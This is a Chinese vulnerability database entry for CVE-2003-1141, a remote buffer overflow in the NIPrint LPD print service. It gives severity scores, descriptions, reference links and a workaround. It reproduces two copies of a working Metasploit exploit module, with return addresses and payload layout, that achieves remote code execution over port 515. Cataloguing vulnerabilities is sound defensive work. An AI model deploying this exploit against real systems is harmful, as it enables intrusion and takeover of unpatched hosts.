CVE-2003-1141
CVSS7.5
发布时间 :2003-11-04 00:00:00
修订时间 :2008-09-05 16:36:09
NMCOEP    

[原文]Buffer overflow in NIPrint 4.10 allows remote attackers to execute arbitrary code via a long string to TCP port 515.


[CNNVD]NIPrint LPD-LPR打印服务程序远程缓冲区溢出漏洞(CNNVD-200311-029)

        
        NIPrint是一款32-bit的Winsock LPD/LPR打印服务程序。
        NIPrint对用户提交给打印口的数据缺少充分边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以系统权限在系统上执行任意指令。
        连接打印机默认监听的端口,提交过多的数据,可导致打印服务程序崩溃,精心构建提交数据可能以SYSTEM进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1141
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1141
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-029
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/13591
(VENDOR_ADVISORY)  XF  niprint-bo(13591)
http://www.securityfocus.com/bid/8968
(VENDOR_ADVISORY)  BID  8968
http://www.securityfocus.com/archive/1/343318
(UNKNOWN)  BUGTRAQ  20031104 NIPrint remote exploit
http://www.securityfocus.com/archive/1/343257
(VENDOR_ADVISORY)  BUGTRAQ  20031104 SRT2003-11-02-0115 - NIPrint LPD-LPR Remote overflow
http://www.osvdb.org/2774
(VENDOR_ADVISORY)  OSVDB  2774
http://secunia.com/advisories/10143
(VENDOR_ADVISORY)  SECUNIA  10143

- 漏洞信息

NIPrint LPD-LPR打印服务程序远程缓冲区溢出漏洞
高危 边界条件错误
2003-11-04 00:00:00 2005-10-20 00:00:00
远程  
        
        NIPrint是一款32-bit的Winsock LPD/LPR打印服务程序。
        NIPrint对用户提交给打印口的数据缺少充分边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以系统权限在系统上执行任意指令。
        连接打印机默认监听的端口,提交过多的数据,可导致打印服务程序崩溃,精心构建提交数据可能以SYSTEM进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Network Instruments
        -------------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.networkinstruments.com/

- 漏洞信息 (16336)

NIPrint LPD Request Overflow (EDBID:16336)
windows remote
2010-12-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: niprint.rb 11407 2010-12-25 06:01:12Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NIPrint LPD Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the
				Network Instrument NIPrint LPD service. Inspired by
				Immunity's VisualSploit :-)
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11407 $',
			'References'     =>
				[
					['CVE', '2003-1141'],
					['OSVDB', '2774'],
					['BID', '8968'],
					['URL',   'http://www.immunitysec.com/documentation/vs_niprint.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi
					['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],
					['Windows 7 x64', { 'Ret' => 0x763B35DD }],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Nov 05 2003'))

		register_options(
			[
				Opt::RPORT(515)
			], self.class )
	end

	def exploit
		connect

		req = rand_text_alphanumeric(8192)
		req[  0, 2] = "\xeb\x33"
		req[ 49, 4] = [target.ret].pack('V')
		req[ 53, payload.encoded.length ] = payload.encoded

		print_status("Trying target #{target.name}...")
		sock.put(req)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83160)

NIPrint LPD Request Overflow (PacketStormID:F83160)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2003-1141
[点击下载]

This Metasploit module exploits a stack overflow in the Network Instrument NIPrint LPD service.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'NIPrint LPD Request Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the
				Network Instrument NIPrint LPD service. Inspired by
				Immunity's VisualSploit :-)
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2003-1141'],
	  				['OSVDB', '2774'],
					['BID', '8968'],
					['URL',   'http://www.immunitysec.com/documentation/vs_niprint.html'],
				],
			'Privileged'     => false,

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi
				],

			'DefaultTarget' => 0))
			
			register_options( [ Opt::RPORT(515) ], self.class )
	end

	def exploit
		connect
		
		req = rand_text_alphanumeric(8192)
		req[  0, 2] = "\xeb\x33"
		req[ 49, 4] = [target.ret].pack('V')
		req[ 53, payload.encoded.length ] = payload.encoded
		
		print_status("Trying target #{target.name}...")
		sock.put(req)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

2774
NIPrint String Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A local buffer overflow exists in Network Instrument's NIPrint V4.10 (and possibly earlier versions). NIPrint v4.10 fails to verify input properly resulting in a buffer overflow, by sending 60 bytes of data to port 515/tcp. This could potentially be exploited to execute arbitrary code on the vulnerable system.

- 时间线

2003-11-05 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Restrict access to the LPD service so that only trusted adresses can connect to it. Do not install NIPrint on systems with untrusted users.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站